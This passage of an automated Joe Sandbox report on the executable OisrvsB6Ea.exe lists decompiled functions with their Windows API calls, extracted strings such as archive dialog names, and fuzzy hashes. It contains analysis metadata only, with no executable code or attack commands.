                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 0027B92D: _wcsrchr.LIBVCRUNTIME ref: 0027B944
                                                                                  • _wcslen.LIBCMT ref: 0027C197
                                                                                  • _wcslen.LIBCMT ref: 0027C1DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                  • String ID: .exe$.rar$.sfx
                                                                                  • API String ID: 3513545583-31770016
                                                                                  • Opcode ID: d2b894195272437da4279b485e97a6d223d6ad5765c0298d27d7d7c4e74aa060
                                                                                  • Instruction ID: 10f27b6cf40fa52e3770f4b491be7379d2fe21d29256730e404bc29eb0f94bb4
                                                                                  • Opcode Fuzzy Hash: d2b894195272437da4279b485e97a6d223d6ad5765c0298d27d7d7c4e74aa060
                                                                                  • Instruction Fuzzy Hash: 95412A2557035296C732AF748842A7BB3A8EF42704F30850EF98D6B1C1EB705DB6C791
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0027BB27
                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0027A275,?,?,00000800,?,0027A23A,?,0027755C), ref: 0027BBC5
                                                                                  • _wcslen.LIBCMT ref: 0027BC3B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                  • String ID: UNC$\\?\
                                                                                  • API String ID: 3341907918-253988292
                                                                                  • Opcode ID: b60bf1937add5d1f3525eb44d2817862e96a84dde9c1bfeeae5c599b1facaebc
                                                                                  • Instruction ID: 30fee266cf2275ed7e67d5480a17a24596e941422d85c0cc40883031e04b4be0
                                                                                  • Opcode Fuzzy Hash: b60bf1937add5d1f3525eb44d2817862e96a84dde9c1bfeeae5c599b1facaebc
                                                                                  • Instruction Fuzzy Hash: 19419275420216AECF23AF60CC42FEB7769AF45394F10C46AF858A7151EB709AB48F60
                                                                                  APIs
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0028CD84
                                                                                    • Part of subcall function 0028AF98: _wcschr.LIBVCRUNTIME ref: 0028B033
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr$CompareString
                                                                                  • String ID: <$HIDE$MAX$MIN
                                                                                  • API String ID: 69343711-3358265660
                                                                                  • Opcode ID: 8e52857694d510bde37f08d127552f11acd9ebc3d9600796bfda3f09bde07773
                                                                                  • Instruction ID: cf0deb481ec069dc7db2f3ed5a66914da3883db372ec4f1539ad08edce89cbd6
                                                                                  • Opcode Fuzzy Hash: 8e52857694d510bde37f08d127552f11acd9ebc3d9600796bfda3f09bde07773
                                                                                  • Instruction Fuzzy Hash: 9631877591121AAADF25EF50CC41EEE73BCEB15350F5041A6F901E71C0EBB09EA48FA1
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0028AAD2
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0028AB01
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0028AB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease
                                                                                  • String ID: -($7(
                                                                                  • API String ID: 1429681911-1843801595
                                                                                  • Opcode ID: 605159b95152c532d5aed7c1d0ae59a0430cbaa799dd2c1f4f3bb9b9d840854b
                                                                                  • Instruction ID: 7ccdb528415e32b7273d1338e3e6f58493559a8db1c2a378373aa543f437f6cf
                                                                                  • Opcode Fuzzy Hash: 605159b95152c532d5aed7c1d0ae59a0430cbaa799dd2c1f4f3bb9b9d840854b
                                                                                  • Instruction Fuzzy Hash: 1E212A72509354AFD3019FA5EC4CE6FBFE9FB89352F04082AFA4592120D7319E548B63
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0027B9B8
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027B9D6
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027B9E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                  • String ID: %c:\
                                                                                  • API String ID: 525462905-3142399695
                                                                                  • Opcode ID: a3a7e025ee48f49f4b2396f72f0d391c053601b7e3b07548f779152fddf04bee
                                                                                  • Instruction ID: 597f04455fe4d9c3a36d63302249579196c0455f5d366d840950edab37a3aed9
                                                                                  • Opcode Fuzzy Hash: a3a7e025ee48f49f4b2396f72f0d391c053601b7e3b07548f779152fddf04bee
                                                                                  • Instruction Fuzzy Hash: 5401F963530312B99B32BB758C4AE6BB7ACEE96770B40C41AF558D6082EB30D47486B1
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028B2BE
                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0028B2D6
                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0028B304
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: GETPASSWORD1$xz,
                                                                                  • API String ID: 445417207-555921176
                                                                                  • Opcode ID: b5e7685844bd05c9fa5b42a13c10f8bb3b5615e31c6a5d66577c3db50763a4fa
                                                                                  • Instruction ID: d39bfd8691e1a4ecbf70339f03125dfafb6ed63133e6b3a0bff1af56084362e2
                                                                                  • Opcode Fuzzy Hash: b5e7685844bd05c9fa5b42a13c10f8bb3b5615e31c6a5d66577c3db50763a4fa
                                                                                  • Instruction Fuzzy Hash: 6011E136921119B6DB22AE74AD49FFF376CEF0A700F004069FA45B20C4C7B09E219B61
                                                                                  APIs
                                                                                  • LoadBitmapW.USER32(00000065), ref: 0028B6ED
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028B712
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028B744
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028B767
                                                                                    • Part of subcall function 0028A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0028B73D,00000066), ref: 0028A6D5
                                                                                    • Part of subcall function 0028A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A6EC
                                                                                    • Part of subcall function 0028A6C2: LoadResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A703
                                                                                    • Part of subcall function 0028A6C2: LockResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A712
                                                                                    • Part of subcall function 0028A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028B73D,00000066), ref: 0028A72D
                                                                                    • Part of subcall function 0028A6C2: GlobalLock.KERNEL32(00000000), ref: 0028A73E
                                                                                    • Part of subcall function 0028A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028A762
                                                                                    • Part of subcall function 0028A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028A7A7
                                                                                    • Part of subcall function 0028A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0028A7C6
                                                                                    • Part of subcall function 0028A6C2: GlobalFree.KERNEL32(00000000), ref: 0028A7CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                  • String ID: ]
                                                                                  • API String ID: 1797374341-3352871620
                                                                                  • Opcode ID: 43b2ada7a4315499eb61ff87bd31b965997f431395aaf37ca04449f798369f29
                                                                                  • Instruction ID: 0b9c452a06616bc2775257e8e0676b65d2225f60a39dad8820ed344ed15df25f
                                                                                  • Opcode Fuzzy Hash: 43b2ada7a4315499eb61ff87bd31b965997f431395aaf37ca04449f798369f29
                                                                                  • Instruction Fuzzy Hash: F801C43B91221267E7127B749C09A7FBB799BC0752F140016F900A72D5DF618D294BA2
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028D64B
                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0028D661
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028D675
                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0028D684
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: RENAMEDLG
                                                                                  • API String ID: 445417207-3299779563
                                                                                  • Opcode ID: 4268203265c2bc4e671d172593ed4b568c5358b1b853fb4e50bf1a30411fe1f1
                                                                                  • Instruction ID: 52b43c77d14ef055cd5707952ff9576c7b0827f40bb8cacb617f6728bff0819a
                                                                                  • Opcode Fuzzy Hash: 4268203265c2bc4e671d172593ed4b568c5358b1b853fb4e50bf1a30411fe1f1
                                                                                  • Instruction Fuzzy Hash: 9C016D377A62297BD210AF24BD0DF57775DEB5A701F014012F305A10D0D6A1AA288B36
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00297E24,?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002), ref: 00297E93
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00297EA6
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00297E24,?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297EC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: ff0dbb4d0464259894d8bb4902472ec3a219ca49044a017cf30d84276a55b77a
                                                                                  • Instruction ID: f030a544a397ec2e7bac1f423f0d506e123eb65a2f9b2140c362fc9c2918bc16
                                                                                  • Opcode Fuzzy Hash: ff0dbb4d0464259894d8bb4902472ec3a219ca49044a017cf30d84276a55b77a
                                                                                  • Instruction Fuzzy Hash: 0CF04F31A24209BBCF11DFA0EC0DB9EBFB5EB49715F0540A9F805A22A0DF309E54CA90
                                                                                  APIs
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027F2E4
                                                                                  • GetProcAddress.KERNEL32(002B81C8,CryptUnprotectMemory), ref: 0027F2F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Similarity
                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                  • API String ID: 2141747552-1753850145
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 2252061734-0
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0029BF39
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029BF5C
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029BF82
                                                                                  • _free.LIBCMT ref: 0029BF95
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029BFA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,002991AD,0029B188,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029986E
                                                                                  • _free.LIBCMT ref: 002998A3
                                                                                  • _free.LIBCMT ref: 002998CA
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 002998D7
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 002998E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  APIs
                                                                                    • Part of subcall function 002811CF: ResetEvent.KERNEL32(?), ref: 002811E1
                                                                                    • Part of subcall function 002811CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002811F5
                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00280F21
                                                                                  • CloseHandle.KERNEL32(?,?), ref: 00280F3B
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00280F54
                                                                                  • CloseHandle.KERNEL32(?), ref: 00280F60
                                                                                  • CloseHandle.KERNEL32(?), ref: 00280F6C
                                                                                    • Part of subcall function 00280FE4: WaitForSingleObject.KERNEL32(?,000000FF,00281101,?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FEA
                                                                                    • Part of subcall function 00280FE4: GetLastError.KERNEL32(?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 1868215902-0
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0029C817
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029C829
                                                                                  • _free.LIBCMT ref: 0029C83B
                                                                                  • _free.LIBCMT ref: 0029C84D
                                                                                  • _free.LIBCMT ref: 0029C85F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00281FE5
                                                                                  • _wcslen.LIBCMT ref: 00281FF6
                                                                                  • _wcslen.LIBCMT ref: 00282006
                                                                                  • _wcslen.LIBCMT ref: 00282014
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0027B371,?,?,00000000,?,?,?), ref: 0028202F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareString
                                                                                  • String ID:
                                                                                  • API String ID: 3397213944-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _swprintf
                                                                                  • String ID: %ls$%s: %s
                                                                                  • API String ID: 589789837-2259941744
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\OisrvsB6Ea.exe,00000104), ref: 00297FAE
                                                                                  • _free.LIBCMT ref: 00298079
                                                                                  • _free.LIBCMT ref: 00298083
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                  • API String ID: 2506810119-3408394523
                                                                                  APIs
                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002931FB
                                                                                  • _abort.LIBCMT ref: 00293306
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer_abort
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 948111806-2084237596
                                                                                  • Opcode ID: 248f72ae026613ff5e14e12bfe9265e72a1e61b1df03b73f8b84fca604bcfcda
                                                                                  • Instruction ID: 361e5a4ca861f63c8c8cefba865f1892ab11b85ccd6e579c38c0bce44c9820fd
                                                                                  • Opcode Fuzzy Hash: 248f72ae026613ff5e14e12bfe9265e72a1e61b1df03b73f8b84fca604bcfcda
                                                                                  • Instruction Fuzzy Hash: CE414A71D1020AAFCF15DF94CD81AEEBBB5BF48304F188099F904A7211D735AE60DB94
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00277406
                                                                                    • Part of subcall function 00273BBA: __EH_prolog.LIBCMT ref: 00273BBF
                                                                                  • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 002774CD
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 3813983858-639343689
                                                                                  • Opcode ID: 613ed78a40b22865090ec1b9b795aa2fa567980df409cc72e4fd68f1de335157
                                                                                  • Instruction ID: e85adde7313149a19164c621d38b80e433a2445566ff83ed7e0aad23a9e142fa
                                                                                  • Opcode Fuzzy Hash: 613ed78a40b22865090ec1b9b795aa2fa567980df409cc72e4fd68f1de335157
                                                                                  • Instruction Fuzzy Hash: 8431C571D24249AADF11EFA4DC49FFEBBB9AF05304F048015F849A7182DB748A64CF61
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028AD98
                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0028ADAD
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028ADC2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 445417207-3402441367
                                                                                  • Opcode ID: 55afa8d1f763ca6ae46270e5a594575710708dcf5a5516cad2cfd08a774cc4b2
                                                                                  • Instruction ID: 8150a514f08a62b4ad8aea12abef6a82e23f2907f916d47cb1f298f161ef5adf
                                                                                  • Opcode Fuzzy Hash: 55afa8d1f763ca6ae46270e5a594575710708dcf5a5516cad2cfd08a774cc4b2
                                                                                  • Instruction Fuzzy Hash: 0E11B436662201BFE721AF68ED09FA63769AF4A702F004013F245DA5E0CB619D359B23
                                                                                  APIs
                                                                                  • DialogBoxParamW.USER32(GETPASSWORD1,0001047E,0028B270,?,?), ref: 0028DE18
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DialogParam
                                                                                  • String ID: GETPASSWORD1$r($xz,
                                                                                  • API String ID: 665744214-1991616170
                                                                                  • Opcode ID: 083c8376658550361cbcf389997ab7261c8ca7b4bdb21afcd0b59383fe85587c
                                                                                  • Instruction ID: 0ef134cd4e8af20c0db116ece4a0b7462d512f210d5d6991f8acd36f4a67403b
                                                                                  • Opcode Fuzzy Hash: 083c8376658550361cbcf389997ab7261c8ca7b4bdb21afcd0b59383fe85587c
                                                                                  • Instruction Fuzzy Hash: 93115E36625144ABDB11EE34BC05BEB33A8A70A351F148475FD49AB0C1CBB0AD64C764
                                                                                  APIs
                                                                                  • __fprintf_l.LIBCMT ref: 0027D954
                                                                                  • _strncpy.LIBCMT ref: 0027D99A
                                                                                    • Part of subcall function 00281DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,002B1030,?,0027D928,00000000,?,00000050,002B1030), ref: 00281DC4
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                  • String ID: $%s$@%s
                                                                                  • API String ID: 562999700-834177443
                                                                                  • Opcode ID: 768c8b9ab64c1bf83201ddd54b50396a0324c99516e3e56412c6cd4ad30b745e
                                                                                  • Instruction ID: e61c6635b02ada2fedbb89089fcd36de7405571dea6db90e96570d97b67a9809
                                                                                  • Opcode Fuzzy Hash: 768c8b9ab64c1bf83201ddd54b50396a0324c99516e3e56412c6cd4ad30b745e
                                                                                  • Instruction Fuzzy Hash: 79219376460249EADF20EEA4CC05FDE7BB8AF06700F048011FA1896192E672D668CF51
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E85
                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E8F
                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027AC5A,00000008,?,00000000,?,0027D22D,?,00000000), ref: 00280E9F
                                                                                  Strings
                                                                                  • Thread pool initialization failed., xrefs: 00280EB7
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: 72a67247a3d5e8a52f5aea423fe9bd2b0b3234bdffdc5bf587e789eb6d657ecc
                                                                                  • Instruction ID: d1468e4d1ff090f39e1023f9b376d487038d326e67d7ed26f2e94e10632f8b2f
                                                                                  • Opcode Fuzzy Hash: 72a67247a3d5e8a52f5aea423fe9bd2b0b3234bdffdc5bf587e789eb6d657ecc
                                                                                  • Instruction Fuzzy Hash: 3C11E7B16117099FC3316F7A9CC89A7FBDCEB55740F104C2EF1DAC2241DAB159508B50
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Malloc
                                                                                  • String ID: (($2($A
                                                                                  • API String ID: 2696272793-1282021134
                                                                                  • Opcode ID: 82114cfadad93fee6de0e13e355b2c6dd33d1481bd31dcf52515a20bff5d9779
                                                                                  • Instruction ID: 9eff14e8acc027df3629059018291bef9708ab45fb11f0fc34f01515dcbe615a
                                                                                  • Opcode Fuzzy Hash: 82114cfadad93fee6de0e13e355b2c6dd33d1481bd31dcf52515a20bff5d9779
                                                                                  • Instruction Fuzzy Hash: D201ED75D01229AFCB14DFA4E848ADEBBF8FF09310B10816AE909E3250D7749E50CFA5
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 455659108e853fb66f060318a69579ec494d883f5eb43749cb019827f8a53a05
                                                                                  • Instruction ID: fa0d9d11290ca4b87876165b8835a990fbe5e285dc728e81a76be6b400c64f6d
